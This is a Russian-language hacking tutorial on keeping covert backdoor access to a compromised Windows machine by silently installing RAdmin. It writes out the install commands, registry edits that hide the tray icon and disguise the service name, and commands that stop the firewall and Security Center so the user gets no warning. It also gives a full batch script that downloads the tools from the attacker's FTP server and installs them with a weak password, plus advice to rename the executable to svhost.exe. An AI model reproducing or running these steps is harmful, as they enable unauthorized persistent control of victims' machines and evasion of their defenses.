0х01. Интро
-----------

Последнее время участились просьбы на форумах о помощи закрепиться на Windows-машинах, да и в ICQ почему-то спрашивают вопросы именно такого рода...и именно про RAdmin. Поэтому, чтобы не обьяснять каждому что к чему, я решил об этом написать...
Итак... Совершенно не важно как вы получили доступ к машине с ОС Windows (локально или удалённым сплойтом), важно что у вас есть потребность в последующем использовать ресурсы и/или данные этой машины. Способов оставить себе лазеёку множество... от бинда порта до установки троянов. Один из многих - это установка RAdmin. Приступим.

0х02. Теория
------------

Да-да... именно теория, так как выяснилось что многие люди незнают коммандной оболочки и что такое *.bat-файлы. Из данной области надо хотя бы знать как пользоваться FTP через cmd.exe =) Придумывать ничего не надо, вот хэлп:

Синтаксис:

ftp [-v] [-d] [-i] [-n] [-g] [-s:имя_файла] [-a] [-w:размер] [-A] [Ведомый компьютер]

... из параметров нам понадобится только:

-v = Запрещает вывод на экран ответа FTP-сервера;
-n = Запрещает автоматический вход в систему в ходе начального подключения;
-s:имя_файла = Указывает текстовый файл с ftp-командами.
Эти команды выполняются автоматически после запуска команды ftp. ;

Также советую почитать справку по коммандам - REG ADD, netsh firewall, net stop/start, чтобы хотябы понимать, что мы будем делать далее...

0х03. Процесс установки
-----------------------

Пользоваться будем RAdmin'ом 2.1 Из все кучи файлов нам нужны только:
r_server.exe, AdmDll.dll, raddrv.dll. Вот что написано в хэлпе:

Usage: r_server.exe options

Options:

/setup - show window dialog box with setup settings (install,remove,port,pass)
/pass:xxxxx - specify a password
/port:xxxxx - specify a port number
/install - install service (Win95/98 or WinNT) and driver (WinNT)
/uninstall - uninstall service and driver, if present
/save - save pass & port to the defau lt program settings in the registry if you not
specify port or\and pass when use this option, default port or\and empty
password will be saved.
/silence - dont show message boxes,in /install, /uninstall or /save commands.
/unregister - delete an already entered key for Radmin.
/? - this help screen

Note, that port and password specified in the command prompt,
always overrides default settings from the registry.

Отсюда видно, что для установки RAdmin'a в коммандной строке необходимо набрать:

CMD>r_server.exe /install /silence
CMD>r_server.exe /port:порт /pass:пароль /save /silence

Всё... RAdmin установлен и его можно использовать. НО! На данном этапе он слишком заметен
из-за иконки в трэе. Для того чтобы её убрать необходимо добавить в реестр несколько
ключей:

В [HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters] - ключ "DisableTrayIcon", тип - REG_BINARY,
значение - 00000001.
В [HKLM\SYSTEM\CurrentControlSet\Services\r_server] - ключ "DisplayName", тип - REG_SZ,
значение - "Service Host Controller".

Сделать это можно коммандами:

CMD>REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
CMD>REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f

0х04. Автоматизация
-------------------

Всё это, конечно, хорошо, но занимает некоторое время. Поэтому было бы неплохо,
сократить количество действий. Для этого напишем *.bat-файл примерно такого содержания:

@echo off
echo open [Adress_FTP]>ra.pif // [Adress_FTP] - адресс FTP-сервера
echo [user] [pass] a>>ra.pif // [user] - логин, [pass] - пароль
echo binary>>ra.pif
echo GET AdmDll.dll [Path]\AdmDll.dll>>ra.pif //
echo GET raddrv.dll [Path]\raddrv.dll>>ra.pif // [Path] - путь к файлам
echo GET r_server.exe [Path]\r_server.exe>>ra.pif //
echo bye>>ra.pif
ftp -v -n -s:ra.pif
c:\windows\r_server.exe /install /silence
c:\windows\r_server.exe /pass:123 /save /silence
REG ADD HKLM\SYSTEM\RAdmin\v2.0\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f
c:\windows\r_server.exe /stop
c:\windows\r_server.exe /start

0х05. Утилизация файрвола
-------------------------

Часто бывает так, что на машине включён фаерволл (пусть даже стандартный) и он нам мешает. В случае с Windows у нас есть 2 пути: отключть его либо добавить необходимые правила. Рассмотрим каждый из них в отдельности.
Итак, как же отключить стандартный фаерволл? В ОС Windows фаерволом является - служба "Брандмауэр Windows/Общий доступ к Интернету (ICS)" или по-простому - sharedaccess.
Останавливается он командой:

CMD>NET STOP "Брандмауэр Windows/Общий доступ к Интернету (ICS)"
либо
CMD>NET STOP sharedaccess

но тут есть свои нюансы... при попытке отключения этой службы - пользователь получит сообщение с предупреждением о небезопасности этого действия. Это неприемлемо! Следовательно нужно сделать так чтобы этого не произошло. За выдачу таких сообщений отвечает служба "Центр обеспечения безопасности" (по-простому - wscsvc). С ледовательно перед отключением фаера, необходимо отключить эту службу одной из двух комманд:

CMD>NET STOP "Центр обеспечения безопасности"
либо
CMD>NET STOP wscsvc

Теперь перейдём к более элегантному методу - добавлению необходимого правила для фаера. В Win XP SP2 модифицировать и добавлять правила можно коммандой netsh firewall. Вот небольшая справка:

добавить правило можно одной коммандой:

CMD>netsh firewall add allowedprogram C:\Progra~1\Radmin\r_server.exe systerm enable
либо
CMD>netsh firewall add portopening TCP 4899 systerm
где systerm - просто назване правила.

Если же на машине установлен не SP2, то придётся поработать добавляя нужные ключи к реестру уже знакомой коммандой REG ADD.

Каким бы способом вы не отключали брандмауэр - удобнее дописать все необходимые комманды в уже созданый в *.bat-файл...

0х06. Ауттро
------------

Несмотря на лёгкость и элегантность этого метода, у него всё же есть несколько минусов, а именно:

- открытый порт 4899. Спрятать средствами RAdmin'a его нельзя. Можно только поменять, добавив при установке ключ /port:[порт];
- Добавляется новый сервис (служба);
- Добавляются записи в реестр;
- Заметен для антивирусов;
- Светиться в процессах. Устраняется путём переименовывания exe-шника во что-нибуть неприметное,
например - svhost.exe =)
- некоторые комманды доступны только в WinXP SP2.

0х07. Ссылки
------------

- http://www.cyberlords.net - Оригинал статьи
- http://www.cyberlords.net/... - сканер радмин серверов с пустым паролем
- http://www.blacklog... - Анализ системы удаленного контроля NTRootKit, E-Zine FH0, 0x01
- http://www.famatech.com/support/faq.php - FAQ, офф-сайт RAdmin'a
- http://www.radmin.com - офф-сайт RAdmin'a
- http://www.rootkit.com
- http://www.ucl.ac.uk/cert/win_intrusion.pdf
- http://www1.umn....ts.pdf - презентация с конференции Defcon
- http://www.windowsecurity.c...nment.html